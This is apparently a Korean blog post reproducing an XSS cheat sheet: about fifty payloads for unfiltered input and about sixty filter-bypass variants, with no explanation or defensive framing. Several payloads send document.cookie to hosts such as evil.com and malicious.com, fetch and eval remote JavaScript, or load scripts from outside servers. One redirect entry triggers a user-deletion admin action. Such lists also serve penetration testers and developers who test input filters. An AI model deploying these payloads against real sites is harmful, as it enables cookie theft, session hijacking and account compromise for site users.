XSS (Cross Site Script) Attack - 2. #Web Hacking #Cheat Sheet #DreaMerZ-Note



GitHub - XSS Cheat Sheet
https://gist.github.com/kurobeats/9a613c9ab68914312cbb415134795b45



    | XSS Cheat Sheet - 패턴 Filter 미 적용 시 (None Bypass Filter)


    1. <script>alert('XSS')</script>
    2. <img src="javascript:alert('XSS')">
    3. <a href="javascript:alert('XSS')">Click me</a>
    4. <iframe src="javascript:alert('XSS')"></iframe>
    5. <object data="javascript:alert('XSS')"></object>
    6. <meta http-equiv="refresh" content="0;url=javascript:alert('XSS')">
    7. <body onload="alert('XSS')">
    8. <input type="text" value="<script>alert('XSS')</script>">
    9. <script src="http://evil.com/malicious.js"></script>
    10. <style>@import 'http://evil.com/malicious.css';</style>
    11. <svg/onload=alert('XSS')>
    12. <!-- <script>alert('XSS')</script> -->
    13. <a href="http://example.com?param=<script>alert('XSS')</script>">Link</a>
    14. <form action="http://example.com"><input type="text" name="input" value="<script>alert('XSS')</script>"></form>
    15. <script>fetch('http://malicious.com').then(response => response.text()).then(data => eval(data))</script>
    16. <script>document.write('<img src="http://malicious.com/cookie?'+document.cookie+'">')</script>
    17. <div onclick="alert('XSS')">Click me</div>
    18. <video src="javascript:alert('XSS')"></video>
    19. <audio src="javascript:alert('XSS')"></audio>
    20. <button onclick="alert('XSS')">Click me</button>
    21. <a href="http://example.com?search=<script>alert('XSS')</script>">Search</a>
    22. javascript:void(alert('XSS'))
    23. <input type="text" onfocus="alert('XSS')">
    24. <input type="image" src="x" onerror="alert('XSS')">
    25. <link href="javascript:alert('XSS')">
    26. <img src="data:image/png;base64,..." onerror="alert('XSS')">
    27. <script>window.location='http://evil.com?cookie='+document.cookie;</script>
    28. <script>eval("alert('XSS')")</script>
    29. <svg><script>alert('XSS')</script></svg>
    30. <body background="javascript:alert('XSS')">
    31. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script>alert('XSS')</script>
    32. <div data-content="<script>alert('XSS')</script>">
    33. <script>document.write('<iframe src="http://malicious.com"></iframe>');</script>
    34. <img src="http://example.com" onerror="fetch('http://evil.com').then(response => response.text()).then(data => eval(data))">
    35. <form action="http://example.com" method="post"><input type="submit" value="<script>alert('XSS')</script>"></form>
    36. <script>setTimeout(() => {alert('XSS')}, 1000);</script>
    37. <input type="text" value="<img src='invalid' onerror='alert(1)'>">
    38. <meta http-equiv="refresh" content="0;url=javascript:alert('XSS')">
    39. <iframe src="javascript:alert('XSS')">
    40. <form><input type="text" name="query" value="<script>alert('XSS')</script>"></form>
    41. <img src="x" onerror="fetch('http://evil.com')" />
    42. <div><a href="http://example.com/redirect?param=<script>alert('XSS')</script>">Click here</a></div>
    43. <h1 onmouseover="alert('XSS')">Hover over me</h1>
    44. <script src="http://evil.com/attack.js"></script>
    45. <input type="text" value="normaltext" onfocus="alert('XSS')">
    46. <svg><script>document.location='http://malicious.com?cookie='+document.cookie;</script></svg>
    47. <script>document.getElementById('output').innerHTML = '<img src="http://malicious.com">';</script>
    48. <script>fetch('http://evil.com/cookie?data=' + document.cookie);</script>
    49. <video><source src="http://malicious.com/video.mp4" onerror="alert('XSS')"></video>
    50. <div onmouseover="fetch('http://evil.com/malicious.js').then(response => response.text()).then(eval)">Hover me</div>



    | XSS Cheat Sheet - 패턴 Filter 적용 시 (Bypass Filter)


    1. &lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;
    2. &lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
    3. &lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
    4. &lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt;
    5. &lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
    6. &lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
    7. &lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt;
    8. &lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt;
    9. &lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt;
    10. &lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;
    11. &lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/FRAMESET&gt;
    12. &lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt;
    13. &lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
    14. &lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
    15. &lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt;
    16. &lt;IMG DYNSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
    17. &lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
    18. &lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;
    19. Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser
    20. exp/*&lt;XSS STYLE=&apos;no\xss:noxss(&quot;*//*&quot;);
    21. &lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
    22. &lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt;
    23. &lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt;
    24. &lt;IMG SRC=&quot;livescript:[code]&quot;&gt;
    25. %BCscript%BEalert(%A2XSS%A2)%BC/script%BE
    26. &lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&apos;XSS&apos;);&quot;&gt;
    27. &lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;
    28. &lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt;
    29. &lt;IMG SRC=&quot;mocha:[code]&quot;&gt;
    30. &lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;
    31. &lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(&apos;XSS&apos;)&gt;&lt;/OBJECT&gt;
    32. &lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;
    33. a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d);
    34. &lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt;
    35. &lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt;
    36. &lt;XSS STYLE=&quot;xss:expression(alert(&apos;XSS&apos;))&quot;&gt;
    37. &lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
    38. &lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt;
    39. &lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
    40. &lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;
    41. &lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt;
    42. &lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;
    43. &lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;
    44. &lt;TABLE BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TABLE&gt;
    45. &lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;
    46. &lt;HTML xmlns:xss&gt;
    47. &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt;
    48. &lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
    49. &lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt;
    50. &lt;HTML&gt;&lt;BODY&gt;
    51. &lt;!--[if gte IE 4]&gt;               
    52. &lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt;
    53. &lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt;
    54. &lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;
    55. &lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt;
    56. &lt;? echo(&apos;&lt;SCR)&apos;;
    57. &lt;BR SIZE=&quot;&amp;{alert(&apos;XSS&apos;)}&quot;&gt;
    58. &lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt;


    댓글 없음: